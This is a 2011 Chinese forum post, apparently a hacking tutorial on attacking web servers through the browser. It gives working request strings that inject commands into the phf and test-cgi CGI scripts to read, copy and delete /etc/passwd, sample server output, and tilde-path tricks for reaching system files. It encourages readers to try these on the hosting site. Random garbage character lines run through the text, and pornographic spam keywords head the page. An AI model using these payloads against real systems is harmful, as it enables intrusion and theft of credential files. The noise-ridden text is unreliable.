久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖
汶上信息港
標(biāo)題:
瀏覽器攻擊
[打印本頁]
作者:
雜七雜八
時(shí)間:
2011-1-12 21:00
標(biāo)題:
瀏覽器攻擊
在本章我將講述一些利用瀏覽器來進(jìn)行攻擊的方法
+ w% c' k8 w ~' |0 h
1。大家都知道了phf攻擊了,phf是cgi script,很多站點(diǎn)都有這個(gè)大漏洞啦,使用
+ f: k7 I; D" ~4 E+ O2 t* p% c' m
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以拿到那個(gè)站點(diǎn)的passwd.但還有些更好的執(zhí)行方法呦如:
2 z/ E/ p( g1 J9 @3 @6 V* K* B
http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna
$ p# C2 R" K" Y
W" y8 c- p7 _+ {3 W1 V$ M* @
me=&Qoffice_phone=
3 Z# i8 ]' C; M. G* e+ A
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=
8 P) Z+ Y) b# y; q
haqr&Qemail=&Qnickname=&Qoffice_phone=
" J2 Q, Z. p9 t; c& N( {' G
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
$ E9 T0 Y) g) K
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
5 o* r0 P) [# y
http://thegnome.com/~someuser/passwd
. a0 G: M$ b, t5 S X6 R4 s) C) h0 E
http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname
8 _6 P/ {5 d& W$ ^
& h* J1 w$ r% J C! D# ]
=haqr&Qemail=&Qnickname=&Qoffice_phone=
. l0 X" J C2 L6 X
上面執(zhí)行的命令是
. x/ A! t2 u% t; i) P# W1 s7 a# s
id
# C& q$ J6 Y2 [1 ]
ls -la ~someuser
, Y! s: E; z1 N; w ]
cp /etc/passwd ~someuser/passwd
; W* ~& w# f: X- S, [+ v
rm ~someuser/passwd
6 }4 C: s- V% X
! W* o/ h+ X4 N+ M9 v1 `3 X+ N
2。有關(guān)test攻擊
2 f% Z2 |8 A/ w9 L3 T
http://thegnome.com/cgi-bin/test-cgi?\whatever
/ V* r9 V0 U% R. [2 `8 m" [& T. F
服務(wù)器會(huì)應(yīng)答,本服務(wù)器的一些情況如:
) `4 e5 G9 m1 C3 L# C% k
CGI/1.0 test script report:
A$ \" j) ~* S, q4 O. I/ m
5 B9 X% u# b5 O1 O
argc is 0. argv is .
+ W) g8 N2 j# Y9 ?6 A
4 W; u5 I. h, J! ?4 s; b* v8 D) N
SERVER_SOFTWARE = NCSA/1.4B
# G, O6 z# m* s+ o
SERVER_NAME = thegnome.com
" G! u `( ^7 m0 Z2 i/ a
GATEWAY_INTERFACE = CGI/1.1
8 E6 {4 A( p, q) {! l, {
SERVER_PROTOCOL = HTTP/1.0
0 y9 s2 U9 j0 B! x5 {5 k5 h/ {
SERVER_PORT = 80
2 ?0 Q' y8 L, j4 `4 V3 V F
REQUEST_METHOD = GET
0 Q9 \3 z, X' z6 Q# @9 a/ ?3 y* \
HTTP_ACCEPT = text/plain, application/x-html, application/html,
* U* ?% n, B h# j. V( Y# M
text/html, text/x-html
: ?8 u1 v9 a. L7 f" k1 }7 i( D
PATH_INFO =
. r8 e3 Z; ^; P7 K' t1 B
PATH_TRANSLATED =
/ d( y0 z+ g3 T4 U M) q- L- ~( f& b
SCRIPT_NAME = /cgi-bin/test-cgi
A1 _8 b! ^0 M n0 D: w
QUERY_STRING = whatever
, T0 n U9 c# {$ ]) r! F- P
REMOTE_HOST = fifth.column.gov
# O$ a% [) Q: U) j
REMOTE_ADDR = 200.200.200.200
7 Q5 X" p& \$ K9 H! u- b* O) k3 `. S
REMOTE_USER =
. d1 w+ `# \, V' M! S
AUTH_TYPE =
; t- \( K/ l) w3 }
CONTENT_TYPE =
7 _- Y {2 s! q% B/ l9 J" ^6 c# {
CONTENT_LENGTH =
6 [2 N- y( x5 g% r4 q6 l
! H1 Q$ r9 |: s: a/ u/ N/ B
好吧,讓我們來點(diǎn)趕興趣的
) q; V8 @- T8 h+ j0 u# S# s4 k
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
- |4 A; S3 \, K+ i2 m) @4 l
+ W: o! F- X1 |" n, W4 C/ k
3。~的應(yīng)用
& y! V w, D% Y! }, D
~主要是用在很多的個(gè)人主頁上的快捷目錄的方法,如果我們使用這樣的~
# x4 V( h0 v, A% e
http://thegnome.com/~root
; T$ i( b5 s+ R3 ^$ D
http://thegnome.com/~root/etc/passwd
" L" z i" ^. R
不是在任何平臺(tái)上都通過呦,在BSD Apache上曾經(jīng)成功過,當(dāng)然還可以試試~bin ,~etc,~uucp.....
# R {( i) ^* B/ P+ T
看到這個(gè)站點(diǎn)了嗎,本站所在的這個(gè)站點(diǎn)就是用這種形式的,如果我們打入 本站所在的web地址/~bin
& z* G* _* F# B0 _+ Y9 u
出現(xiàn)了什么,你看到了嗎?然后...............注意請(qǐng)不要破壞
* t' O+ s+ z# W- b$ a
0 O% v. k! z! L; ]
歡迎光臨 汶上信息港 (http://m.junkejituan.com/)
Powered by Discuz! X3.5